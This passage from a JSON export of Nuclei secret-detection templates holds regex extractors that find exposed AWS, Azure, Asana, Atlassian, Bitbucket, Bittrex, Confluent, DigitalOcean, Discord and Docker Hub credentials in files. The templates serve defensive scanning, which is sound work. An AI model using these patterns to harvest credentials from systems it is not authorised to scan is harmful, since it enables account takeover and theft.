.]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{30})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a0048304602210087f98e454e5064757753028db3f4a280d96ee2ba47163b503031bb9000820d73022100f8348ca58ad2ee80dba4b7ccbca37a95b7ba44742a4f0ed2f5fd64b952843ef1:922c64590222798bb761d5b6d8e72950", "hash": "b586aa1ea9a912a35294c988018d9673", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d18" }, "name": "amazon-account-id.yaml", "content": "id: amazon-account-id\n\ninfo:\n name: Amazon Web Services Account ID - Detect\n author: DhiyaneshDK\n severity: info\n description: Amazon Web Services Account ID token was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: file,keys,aws,amazon,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)aws_?(?:account)_?(?:id)?[\"''`]?\\s{0,30}(?::|=>|=)\\s{0,30}[\"''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})'\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a00483046022100ad930551f3063ad8ee7027d7e0af408452b42a4dc33ba7a99e5bcbcf845c7e05022100b1d4fcc47c2ae007d17b06c945a91c56d8f4f5166d69688d8707bc4fcb69266e:922c64590222798bb761d5b6d8e72950", "hash": "988133104978b3699f0070e31285cf98", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d19" }, "name": "amazon-mws-auth-token.yaml", "content": "id: amazon-mws-auth-token-value\n\ninfo:\n name: Amazon MWS Authentication Token - Detect\n author: gaurang\n severity: medium\n description: Amazon MWS authentication token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: file,keys,token,amazon,auth,mws\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\"\n# digest: 4a0a00473045022100c334a6bda970ddcb70079df2f8a9a1769a7104636a611691c28787921fc2a1a102200bfe666c925c702093688b5f70b29028fa8c8c92c8b739cee1eaaa3a92144494:922c64590222798bb761d5b6d8e72950", "hash": "876dfb7a3e43d5d938b1b6024060f0e9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1a" }, "name": "amazon-session-token.yaml", "content": "id: amazon-session-token\n\ninfo:\n name: Amazon Session Token - Detect\n author: DhiyaneshDK\n severity: info\n description: Amazon session token was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: file,keys,aws,amazon,token,session\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)[\"''`]?\\s{0,30}(?::|=>|=)\\s{0,30}[\"''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]'\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022012a50d46848dcc172a05c5e2fd88e802af8022bf13ab09dbf8740ae3ad5855f5022100c16953404125451a8cfc4ed26412b99b0d25c02e73a6c7ba8337a905c7e2efa9:922c64590222798bb761d5b6d8e72950", "hash": "2ccd1bf9c787333ce0104fc7d3134a50", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1b" }, "name": "amazon-sns-token.yaml", "content": "id: amazon-sns-token\n\ninfo:\n name: Amazon SNS Token - Detect\n author: TheBinitGhimire\n severity: info\n description: Amazon SNS token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token,amazon,aws,sns\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: amazon-sns-topic\n regex:\n - 'arn:aws:sns:[a-z0-9\\-]+:[0-9]+:[A-Za-z0-9\\-_]+'\n\n# Enhanced by md on 2023/05/04\n# digest: 490a0046304402207e55ee87e40a2d4d85bcc06d548501b06c21297fdc881073d65676a4819deca30220739ca22a94917910a17365d5f3118dc91aec1092877dc91905cc1f2a0458100d:922c64590222798bb761d5b6d8e72950", "hash": "74588b07b62ce5bce35e0e361489efc8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1c" }, "name": "aws-access-id.yaml", "content": "id: aws-access-key\n\ninfo:\n name: Amazon Web Services Access Key ID - Detect\n author: gaurang\n severity: info\n description: Amazon Web Services Access Key ID token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token,aws,amazon\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\"\n# digest: 4a0a0047304502204131589055933e9abecb047239e920aaa9798065f2947a61b8a2ddd8be6fa73a0221009f95d88336637ef94923f4724a94bf96e48debf07677bae0fa3a2e6988751396:922c64590222798bb761d5b6d8e72950", "hash": "209c9e11d9ba327dfd951732300c312b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1d" }, "name": "aws-cognito.yaml", "content": "id: aws-cognito-pool\n\ninfo:\n name: Amazon Web Services Cognito Pool ID - Detect\n author: gaurang\n severity: info\n description: Amazon Web Services Cognito Pool ID token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token,aws,amazon\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"ap-northeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-northeast-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-southeast-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-southeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-south-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ca-central-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ca-central-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-north-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-east-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n# digest: 4a0a0047304502210090ee38d9121141c817986346c8a6e0c5910ee05a6cef57dc63ca444a691e292902203a724d1adda15bb0aa60207d79057c6cf7dc3c84bc929f9bf50b34f314fef15d:922c64590222798bb761d5b6d8e72950", "hash": "0ef859a0d197a1fd985e1691c67eaca7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1e" }, "name": "asana-clientid.yaml", "content": "id: asana-clientid\n\ninfo:\n name: Asana Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml\n metadata:\n verified: true\n tags: asana,client,file,keys\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:asana)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([0-9]{16})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100ee80a7c2a35b34bc0d48c69c1e26169ef5a2181505d3836e47974bc04e41fbde0220796c13e9c14005e438971b5e1aa2f241fb1a2736a98df48c1acc98e50b1562b9:922c64590222798bb761d5b6d8e72950", "hash": "34efbf9c81dd7282ffe09e0445e5efca", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1f" }, "name": "asana-clientsecret.yaml", "content": "id: asana-clientsecret\n\ninfo:\n name: Asana Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml\n metadata:\n verified: true\n tags: asana,client,file,keys,secret\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:asana)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100a61527e5da6fb4b6f5e194679ac675364422d0a7a09fef2ed10c8d3982694d55022100a24d80c553e4d28e07ce752f5ab161faff53f39ea00a37ea4872f3c8564c4f6d:922c64590222798bb761d5b6d8e72950", "hash": "a9526c13769273157f657e241b7a0c85", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d20" }, "name": "atlassian-api-token.yaml", "content": "id: atlassian-api-token\n\ninfo:\n name: Atlassian API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml\n metadata:\n verified: true\n tags: file,keys,atlassian,token,api\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{24})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a0046304402205433d3902cf7e3c7635bf23232f379b1aef00a5392fd97cd14771a114acd0a3902204babacddd38ce1156ad037e03c2f52b998acc6da7448013a7d6489edafd42644:922c64590222798bb761d5b6d8e72950", "hash": "d23874d98e5c3456c09e85e2e95061b0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d21" }, "name": "azure-connection-string.yaml", "content": "id: azure-connection-string\n\ninfo:\n name: Azure Connection String\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/azure.yml\n - https://azure.microsoft.com/en-us/blog/windows-azure-web-sites-how-application-strings-and-connection-strings-work/\n - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string\n metadata:\n verified: true\n tags: file,keys,azure,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:AccountName|SharedAccessKeyName|SharedSecretIssuer)\\s*=\\s*([^;]{1,80})\\s*;\\s*.{0,10}\\s*(?:AccountKey|SharedAccessKey|SharedSecretValue)\\s*=\\s*([^;]{1,100})(?:;|$)\n# digest: 490a004630440220680a55e8f1637508067947365d16659ebab85715a5b72613a39a14ac532914d702200a85b3b169d8acce55b4c33ebac26467defc1310779b3b16244675de92908777:922c64590222798bb761d5b6d8e72950", "hash": "51ef042d625d68854355614392f1266a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d22" }, "name": "bitbucket-client-id.yaml", "content": "id: bitbucket-client-id\n\ninfo:\n name: BitBucket Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go\n metadata:\n verified: true\n tags: file,keys,bitbucket,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bitbucket)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a0047304502201417604f83b80d514451141d4ae98b8b004d867c152282e139b7a294f55ac7af022100efab4733e59dc11e40c5cdfb08ab7409cf4a52bfe29eb62ebd63899ed943ff1d:922c64590222798bb761d5b6d8e72950", "hash": "6d8a9392b36602cd53c68aa5f951adf9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d23" }, "name": "bitbucket-client-secret.yaml", "content": "id: bitbucket-client-secret\n\ninfo:\n name: BitBucket Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go\n metadata:\n verified: true\n tags: keys,file,bitbucket,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bitbucket)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022030dd4c8ba7ac15cf49da8046aa615f90ad0ca7bf9eb598d39ec8bac6bbbf17640221009bafe394c64b827479ac32383647bab0117a309f7c071f43399fddd575648bad:922c64590222798bb761d5b6d8e72950", "hash": "04cd580abc4c8851f56b0ed9a1705ea7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d24" }, "name": "bittrex-access-key.yaml", "content": "id: bittrex-access-key\n\ninfo:\n name: Bittrex Access Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go\n metadata:\n verified: true\n tags: file,keys,bittrex,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bittrex)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022021ae3b7bce6c874e3e9933741ecdd4a2950a724f5db03308c3d049b7fc8e3be0022100e2d9f990ba789c6f762dbfd3b566867d99336ef9f7be3b21f08fbb17cbd7e74d:922c64590222798bb761d5b6d8e72950", "hash": "9fe1aa1d8a030ac12a5d54f71c82d493", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d25" }, "name": "bittrex-secret-key.yaml", "content": "id: bittrex-secret-key\n\ninfo:\n name: Bittrex Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go\n metadata:\n verified: true\n tags: file,keys,bittrex,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bittrex)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a0048304602210080c3ff4f4d8f64380bbd4965cc0bf17aee48eec5d25f16020cd6c07a12e5a070022100f9df5e67a69fbd471e028a1fbe6e58159fc49c126517256fc1eeb86a0a25771d:922c64590222798bb761d5b6d8e72950", "hash": "9d24b21f6f3d8468dc71b85d7d6d7eed", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d26" }, "name": "confluent-access-token.yaml", "content": "id: confluent-access-token\n\ninfo:\n name: Confluent Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go\n metadata:\n verified: true\n tags: file,keys,confluent,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:confluent)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{16})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022052eb9ef8330fc9119a458e687bfca7793b685ce74eddc06240c335e7c96a99bc022100c61c476b70924ed367251bd8c85ee9f3afa3d2eea7f7615a84a946483f5b4c0c:922c64590222798bb761d5b6d8e72950", "hash": "4a889a39874590f49fd5f1c0cafd2c2e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d27" }, "name": "confluent-secret-token.yaml", "content": "id: confluent-secret-token\n\ninfo:\n name: Confluent Secret Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go\n metadata:\n verified: true\n tags: file,keys,confluent,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:confluent)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022007beb1f0b9057e5ecc0720838d8231c8e9ea04a7fe980a69a2bb92d2242a6ee90220521bc9d4be872b1d912312e2eb03e3e3dba550f0963fadf6eabfb4742fc72d2f:922c64590222798bb761d5b6d8e72950", "hash": "0eafd6bb2c48b8f8dbd157e028e22096", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d28" }, "name": "dependency-track.yaml", "content": "id: dependency-track\n\ninfo:\n name: Dependency Track API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dependency_track.yml\n - https://docs.dependencytrack.org/integrations/rest-api/\n - https://docs.dependencytrack.org/getting-started/configuration/\n metadata:\n verified: true\n max-request: 1\n tags: dependency,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(odt_[A-Za-z0-9]{32,255})\\b\n# digest: 4a0a004730450220702a4c3c4219c5f6c449c503a1ada1924589fe8a8ee69ca9788a4fd1da542a7f022100c396ad3ca884547cbb32a55a497a33e09e9d592987536b27742dae33485e1abf:922c64590222798bb761d5b6d8e72950", "hash": "9d0265048e0d91580fc30906c4481219", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d29" }, "name": "digitalocean-access-token.yaml", "content": "id: digitalocean-personal-token\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml\n - https://docs.digitalocean.com/reference/api/\n metadata:\n verified: true\n tags: keys,file,digitalocean,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(doo_v1_[a-f0-9]{64})\\b\n# digest: 4a0a0047304502201ccaf3d5a659a1894d1c7a03933525e497128dcc3bf18923983865cbc0589f4f022100d373d44b781d6d17d86eb95e98b1293ea6fe64100591124dc0aba8caa73c600e:922c64590222798bb761d5b6d8e72950", "hash": "cde2a1d636ea472c821c3526e2234402", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2a" }, "name": "digitalocean-personal-access.yaml", "content": "id: digitalocean-personal-access\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml\n - https://docs.digitalocean.com/reference/api/\n metadata:\n verified: true\n tags: file,keys,digitalocean,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(dop_v1_[a-f0-9]{64})\\b\n# digest: 4a0a00473045022100f146de3e812aa02bc68e6bd8a380bbb31e19020d3b029b7058a43b25a50cd67c02201aaa5c47262abba69de2d0520cab36504880f2eb20785e5c81e7af2d4e20d1bd:922c64590222798bb761d5b6d8e72950", "hash": "15d00735f5ba9ee7eb7f9151c9d6c893", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2b" }, "name": "digitalocean-refresh-token.yaml", "content": "id: digitalocean-refresh-token\n\ninfo:\n name: DigitalOcean Refresh Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml\n - https://docs.digitalocean.com/reference/api/\n metadata:\n verified: true\n tags: file,keys,digitalocean,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(dor_v1_[a-f0-9]{64})\\b\n# digest: 4a0a004730450220402ac7235c9f81afab06065b456d5b16538ef65064d66dc59b93ffe594109f6b022100eceb599d627e574fc31382e8444e8101d779d0480e9a98691a2834a2658e6dff:922c64590222798bb761d5b6d8e72950", "hash": "af12121e5c5b5baaa8816ca4b12ab8e9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2c" }, "name": "discord-api-token.yaml", "content": "id: discord-api-token\n\ninfo:\n name: Discord API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go\n metadata:\n verified: true\n tags: file,keys,discord,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:discord)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022037733afdc50da25bb9aad70105e098f1202e735dc5444395ce93ab296deaa5e9022067beba9000a0f6beb4c06e8ee726b8da6eb5c318ed497acb539100d2c07dee3b:922c64590222798bb761d5b6d8e72950", "hash": "4ac35699a989774945595eb07057bd92", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2d" }, "name": "discord-cilent-secret.yaml", "content": "id: discord-client-secret\n\ninfo:\n name: Discord Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go\n metadata:\n verified: true\n tags: file,keys,discord,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:discord)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a004730450220062ecfed26d7eb92b1d368f4f782bed33d615438b7c4b3a871d9f1091303a4fe0221009c6cea2becc2a92e0c9f93c543c62d968c6867ed5e09974db976775127e0979e:922c64590222798bb761d5b6d8e72950", "hash": "f33705d579564f9385a6a5ba8e6510cb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2e" }, "name": "discord-client-id.yaml", "content": "id: discord-client-id\n\ninfo:\n name: Discord Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go\n metadata:\n verified: true\n tags: file,keys,discord,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:discord)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([0-9]{18})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a0047304502200d273d5de14ba14f6ffb36950cef0703e6397c3b39ce626788b05c5175646176022100b31634e39d09a01921856286b8498ec9d340d32e9b39c2a70878fc034bbf8499:922c64590222798bb761d5b6d8e72950", "hash": "45777083b0d638ba1d4b2c92c077548f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2f" }, "name": "dockerhub-pat.yaml", "content": "id: dockerhub-pat\n\ninfo:\n name: Docker Hub Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dockerhub.yml\n - https://docs.docker.com/security/for-developers/access-tokens/\n metadata:\n verified: true\n tags: docker,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - 